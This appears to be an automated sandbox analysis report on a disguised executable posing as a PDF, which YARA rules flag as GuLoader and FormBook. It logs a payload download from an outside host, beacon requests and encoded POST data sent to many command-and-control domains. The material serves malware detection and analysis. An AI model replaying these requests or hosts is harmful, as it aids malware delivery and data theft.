                                                                    Apr 24, 2024 12:33:21.233472109 CEST2578OUTData Raw: 5a 55 46 36 76 34 77 58 45 6f 53 79 32 45 38 6a 39 64 50 75 2f 46 7a 39 69 54 6a 56 31 30 43 73 54 4b 33 2f 73 49 4e 35 4a 64 46 4a 68 32 76 61 42 4f 78 76 6b 39 43 48 43 78 2b 78 73 43 52 75 7a 36 46 74 7a 74 53 34 39 67 38 4a 70 47 4c 6f 6f 7a
                                                                    Data Ascii: ZUF6v4wXEoSy2E8j9dPu/Fz9iTjV10CsTK3/sIN5JdFJh2vaBOxvk9CHCx+xsCRuz6FtztS49g8JpGLoozIF/wNAzREoCzBLHXIfKlRgyGxQNgtf9vrZWxd8Y0CRpBW/IJJWQDRvZHrkBMz/jya1jlZzagWf697mj9scKaCRtu/flDiBkvdUKDObp4uFe4CueBpawd77ZXFJ1Tyo7hLmXpeaaR1vuoG1VlOFoFHDv2yO/MbFTkO
                                                                    Apr 24, 2024 12:33:21.404459000 CEST2578OUTData Raw: 51 58 63 59 78 62 74 46 48 39 31 66 52 44 67 75 4a 71 68 39 52 56 71 4f 41 4a 48 76 36 66 47 59 38 4f 77 33 47 32 33 47 68 79 55 6d 52 30 6c 53 68 64 76 6f 61 4b 6b 54 46 4c 2f 71 6d 67 2f 45 63 77 45 73 55 36 70 57 71 78 2f 65 6a 36 44 6c 36 6f
                                                                    Data Ascii: QXcYxbtFH91fRDguJqh9RVqOAJHv6fGY8Ow3G23GhyUmR0lShdvoaKkTFL/qmg/EcwEsU6pWqx/ej6Dl6o841WvS+hNp26obX1TnGI/gZe3CsM/iQPiGSFLwNIVbEG+MMTBVQJ0BBQUSMMKSouleU8kOTXdgtc+OYHi8OwndtmzjGsKgXbo9BsDNVqZL9vzEA9fDSurKmNgq+nJyl0GkGpCCFrifcNs6hb5Bl1hnCRAcHEERWep
                                                                    Apr 24, 2024 12:33:21.404618025 CEST1289OUTData Raw: 56 34 6d 6a 64 62 43 47 50 6a 79 70 6e 45 63 76 45 4c 48 2b 32 75 58 53 6d 6c 44 52 6c 47 42 42 39 2f 38 70 46 2b 4e 77 61 37 4d 36 35 4f 35 77 68 75 59 41 30 41 6e 4f 6d 6c 58 6e 69 4e 38 53 45 41 58 4d 77 31 54 49 4d 73 52 44 31 61 30 58 4e 44
                                                                    Data Ascii: V4mjdbCGPjypnEcvELH+2uXSmlDRlGBB9/8pF+Nwa7M65O5whuYA0AnOmlXniN8SEAXMw1TIMsRD1a0XNDP+ZSMibH3R3SJYR7enZ/H7OHUGtrly+vSaEbe5E7HrgGuzFH9VgnqSfP9tC8GbxQImtVP9/qU7VviIYewYh9pD480dyVDCc5VQRKP4+o3PZhD/gx9GIu6AZ+2qMZSKiUSwfXMmlbqHHh7uNzFwIjjNuLMn0pL5VVB
                                                                    Apr 24, 2024 12:33:21.404840946 CEST10312OUTData Raw: 4c 74 6d 6d 56 52 34 4e 4c 49 4b 67 72 62 65 47 71 67 46 31 71 61 36 56 37 32 36 6c 4e 4c 71 6e 4e 37 70 6d 39 68 79 58 70 50 6d 46 55 2b 64 78 32 6e 6d 48 33 55 67 34 74 49 6d 62 4b 4f 31 58 6c 54 59 4a 50 6f 46 4f 69 6c 2b 37 46 64 31 52 77 33
                                                                    Data Ascii: LtmmVR4NLIKgrbeGqgF1qa6V726lNLqnN7pm9hyXpPmFU+dx2nmH3Ug4tImbKO1XlTYJPoFOil+7Fd1Rw3YeiFjvr7G1dlsEKXSLvriHuuGGVKcE5UT9osiGW5tMvq6fLjyiZZQ9sdMgRfaJDl0WQv1cWA1HqD/MroL9IVzfCnsybj0kvWo+qmgXqO5/hs2Mb68riTFqFYGtYQw3ZNxoUcBWjtjUOCFYT40vDQAMBBkKmNTCeuP
                                                                    Apr 24, 2024 12:33:21.404953957 CEST547OUTData Raw: 55 33 43 68 66 4a 43 78 47 38 41 34 71 73 69 41 2f 41 7a 61 77 79 5a 6f 2f 51 47 78 44 4e 2f 73 73 47 67 63 4d 75 67 69 4a 4f 63 78 74 53 45 73 6e 4c 41 4c 31 78 44 52 42 4d 79 72 41 63 61 56 68 61 72 58 55 65 43 71 50 4a 62 32 78 63 59 39 34 55
                                                                    Data Ascii: U3ChfJCxG8A4qsiA/AzawyZo/QGxDN/ssGgcMugiJOcxtSEsnLAL1xDRBMyrAcaVharXUeCqPJb2xcY94U6wzjWcu21A3ru/FGUWF6QU+gC3DqBjsGJM/vX8dy6cfmokQmEnmHiDwQcEvioLvNR+pYmO2UNEB80Qstt1bUAmpI1fybYZ40ITTGbO8ts/hP4x2KHBsvMmIm7be3d7fLM0/uT6ZqB+v/p/rIdFzVwf3j/fYuOXRSp
                                                                    Apr 24, 2024 12:33:21.624972105 CEST  533  IN  HTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:33:21 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID  Source IP      Source Port  Destination IP   Destination Port
                                                                    69          192.168.11.20  50314        203.161.49.193   80
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Apr 24, 2024 12:33:23.753855944 CEST  389  OUT  GET /8cgp/?Xh9lX=983bcoiGgeytF04qoACGbDKY/XdXjFbfWR4mUmAai3szv0RRsFt8B5NwzCzTf8Kup64VkssKhH1SAFuTkhM3B+3j/r4OeS1gek1PDXkJF4iS0+BJcCSan5A=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.techfun.info
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:33:23.936319113 CEST  548  IN  HTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:33:23 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID  Source IP      Source Port  Destination IP   Destination Port
                                                                    70          192.168.11.20  50319        91.195.240.19    80
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Apr 24, 2024 12:33:52.536752939 CEST  689  OUT  POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.concretedailypress.net
                                                                    Origin: http://www.concretedailypress.net
                                                                    Referer: http://www.concretedailypress.net/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Ascii: Xh9lX=SlYt2YyTN/H6MC+9zDHTspOKK0eLdgCXdTl9a5LnnKWz8KiyfjtTzbAhaKTXh/ga50gTBFQaZWsq/AuTyul1zgIxrW2gJAHdbMaMPmWJtkgpJMGiA3sXteZ6LFomNNfqjeelMDSuM46oxY+jdHPCOEqIyOze5y/m4KsoZ9yWvMUtcTZheA8pl8c1egNJ0E1ggg==
                                                                    Apr 24, 2024 12:33:52.842437029 CEST  299  IN  HTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:33:52 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID  Source IP      Source Port  Destination IP   Destination Port
                                                                    71          192.168.11.20  50320        91.195.240.19    80
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Apr 24, 2024 12:33:55.363975048 CEST  1029  OUT  POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.concretedailypress.net
                                                                    Origin: http://www.concretedailypress.net
                                                                    Referer: http://www.concretedailypress.net/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:33:55.669560909 CEST  299  IN  HTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:33:55 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID  Source IP      Source Port  Destination IP   Destination Port
                                                                    72          192.168.11.20  50321        91.195.240.19    80
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Apr 24, 2024 12:33:58.198523998 CEST  6445  OUT  POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.concretedailypress.net
                                                                    Origin: http://www.concretedailypress.net
                                                                    Referer: http://www.concretedailypress.net/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:33:58.510179043 CEST  299  IN  HTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:33:58 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    73 | 192.168.11.20 | 50322 | 91.195.240.19 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:34:01.040357113 CEST | 404 | OUT | GET /8cgp/?Xh9lX=fnwN1v/cGsL5Viy/xGPo7bu3BFyPSCGRcDxJWuOrmZaTk6+QfBJJ6K85NdT8x6wg+kdjGkUCY343uxqa5Yt4yEVQtg3mZjTzeLq2Z0Ov3khzfcaVVj80n48=&ad64=U4M8cbh8kd HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.concretedailypress.net
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:34:01.351702929 CEST | 107 | IN | HTTP/1.1 439
                                                                    date: Wed, 24 Apr 2024 10:34:01 GMT
                                                                    content-length: 0
                                                                    server: NginX
                                                                    connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    74 | 192.168.11.20 | 50327 | 137.220.252.40 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:34:28.475857973 CEST | 393 | OUT | GET /8cgp/?Xh9lX=27hjRPCyRlHKx+9Yvp9X/66HqVrlT4yXNX1Fx10RnhcFdFyjtbgqtspXt/m7h19M1tNaQu/ADV6ErOuMACLC0xl2a7R1sTqGKQn1UwmaLCfsUIitr9DM5TM=&ad64=U4M8cbh8kd HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.387mfyr.sbs
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:34:28.741910934 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:34:28 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 146
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    75 | 192.168.11.20 | 50328 | 51.77.215.151 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:34:34.056957006 CEST | 392 | OUT | GET /8cgp/?QDnH=ERXP8&Xh9lX=Rt3kyQgIVYud0ZxfjVmkNGlq6oguJ3Bu0zZO/jPZwrZwphqha226ELu53C2wC06UMZB3RXlB5IubdFV8wNllBFtqfqdEgmnsNC5NpQzeW4FZZkQ+d4TAHSc= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.arilyfarlico.ru
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:34:34.361831903 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                    Date: Wed, 24 Apr 2024 10:34:34 GMT
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Content-Length: 20
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Data Raw: 55 6e 6b 6e 6f 77 6e 20 72 65 71 75 65 73 74 20 74 79 70 65
                                                                    Data Ascii: Unknown request type


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    76 | 192.168.11.20 | 50329 | 64.190.62.22 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:34:39.689107895 CEST | 398 | OUT | GET /8cgp/?Xh9lX=0rOrON9KCedqtp/KEErYODOsqb1Ol5SKTVjby8oNAnBpXQ3f6KiEeGIyIQ0Oonef/1tP4f58WruRrbReuj87L8qx+pUtt26y1FhkvVaaULxp4u5kv8q4N/k=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.donantedeovulos.space
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:34:39.999948025 CEST | 107 | IN | HTTP/1.1 439
                                                                    date: Wed, 24 Apr 2024 10:34:39 GMT
                                                                    content-length: 0
                                                                    server: NginX
                                                                    connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    77 | 192.168.11.20 | 50330 | 108.186.8.155 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:34:55.528579950 CEST | 388 | OUT | GET /8cgp/?QDnH=ERXP8&Xh9lX=TrWImKkXg72XbxtkItxdCHOg9XWXWDqE4iO1qHTBwn9T3tQecLtkumbZqYeYuSkxtGpQmOvVFI5PSbSpBsnHilSWnmtQ3orkxGs2pUIdqKkLQC6qurdmbFs= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.kader42.top
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:34:55.698564053 CEST | 209 | IN | HTTP/1.1 200 OK
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                    X-Powered-By: Nginx
                                                                    Date: Wed, 24 Apr 2024 10:34:54 GMT
                                                                    Connection: close
                                                                    Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                    Data Ascii: 3
                                                                    Apr 24, 2024 12:34:55.698673964 CEST | 805 | IN | Data Raw: 33 31 65 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 e5 a8
                                                                    Data Ascii: 31e<html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script>(function(){ var bp = document.c
                                                                    Apr 24, 2024 12:34:55.698700905 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    78 | 192.168.11.20 | 50331 | 84.32.84.32 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:35:01.895152092 CEST | 390 | OUT | GET /8cgp/?Xh9lX=/YVHZOSW055QRFdzHV7EG4MPV06WciwOGAsmatOqDuiKItV6nqBs0pBRyzlLrNgNpWUhFR7Gbz8/7vzQvyrSOcbiMu9Z7oEFzfRxNbVqKIwXHjZvBpZwwR0=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.noispisok.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:35:02.230283976 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                    Server: hcdn
                                                                    Date: Wed, 24 Apr 2024 10:35:02 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 10072
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    x-hcdn-request-id: e44bf6636d2b963a5facac7a467db33e-asc-edge3
                                                                    Expires: Wed, 24 Apr 2024 10:35:01 GMT
                                                                    Cache-Control: no-cache
                                                                    Accept-Ranges: bytes
                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    79 | 192.168.11.20 | 50332 | 118.27.122.214 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:35:07.528105021 CEST | 392 | OUT | GET /8cgp/?QDnH=ERXP8&Xh9lX=IdWor3433k1T0EOhXt9dLiY9DbR+hWBcDBqvgnp+doAH8LsyGz9SvmmDD05EUVbRqIr7chpXUFkFyWAkdZSUbSWj4Fm/Hc2PGDqx2ZME3zVnMVls2zAW0u4= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.kansaiwoody.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:35:07.810910940 CEST | 359 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:35:07 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 196
                                                                    Connection: close
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    80 | 192.168.11.20 | 50333 | 157.7.107.63 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:35:13.105195999 CEST | 396 | OUT | GET /8cgp/?Xh9lX=4GuIeZ5/FrknERHMXrNh6P2zNKgrxoOsX8fLf9+FvaUhJPhi6YvqajOryTNmV9FzTg+fg8zx27kOMjM9ARbv/mO9DinSc6hkOsxZ/ooW+MqGv6LVFVbELEQ=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.a-two-spa-salon.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:35:13.579597950 CEST | 507 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Date: Wed, 24 Apr 2024 10:35:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/8.2.18
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    X-Redirect-By: WordPress
                                                                    Location: http://a-two-spa-salon.com/8cgp/?Xh9lX=4GuIeZ5/FrknERHMXrNh6P2zNKgrxoOsX8fLf9+FvaUhJPhi6YvqajOryTNmV9FzTg+fg8zx27kOMjM9ARbv/mO9DinSc6hkOsxZ/ooW+MqGv6LVFVbELEQ=&QDnH=ERXP8
                                                                    X-Cache: MISS


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    81 | 192.168.11.20 | 50334 | 203.161.49.193 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:35:23.936424971 CEST | 389 | OUT | GET /8cgp/?Xh9lX=983bcoiGgeytF04qoACGbDKY/XdXjFbfWR4mUmAai3szv0RRsFt8B5NwzCzTf8Kup64VkssKhH1SAFuTkhM3B+3j/r4OeS1gek1PDXkJF4iS0+BJcCSan5A=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.techfun.info
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:35:24.130976915 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:35:24 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    0 | 192.168.11.20 | 50244 | 37.251.143.215 | 443 | 2376 | C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    2024-04-24 10:27:28 UTC | 200 | OUT | GET /calitateX/lUMnxNJflRDqoVSbz65.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: absorbante-calitate.ro
                                                                    Cache-Control: no-cache
                                                                    2024-04-24 10:27:28 UTC | 259 | IN | HTTP/1.1 200 OK
                                                                    Date: Wed, 24 Apr 2024 10:27:27 GMT
                                                                    Server: Apache
                                                                    Last-Modified: Wed, 24 Apr 2024 05:15:40 GMT
                                                                    ETag: "ba0101-42040-616d0c2f6e0d7"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 270400
                                                                    Connection: close
                                                                    Content-Type: application/octet-stream


                                                                    Target ID:0
                                                                    Start time:12:26:31
                                                                    Start date:24/04/2024
                                                                    Path:C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"
                                                                    Imagebase:0x400000
                                                                    File size:646'803 bytes
                                                                    MD5 hash:7206084219E20FE7575AEC63A3422A5C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.13454509223.0000000007965000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:12:27:09
                                                                    Start date:24/04/2024
                                                                    Path:C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"
                                                                    Imagebase:0x400000
                                                                    File size:646'803 bytes
                                                                    MD5 hash:7206084219E20FE7575AEC63A3422A5C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:12:27:38
                                                                    Start date:24/04/2024
                                                                    Path:C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe"
                                                                    Imagebase:0xca0000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:5
                                                                    Start time:12:27:39
                                                                    Start date:24/04/2024
                                                                    Path:C:\Windows\SysWOW64\write.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\write.exe"
                                                                    Imagebase:0x760000
                                                                    File size:10'240 bytes
                                                                    MD5 hash:3D6FDBA2878656FA9ECB81F6ECE45703
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
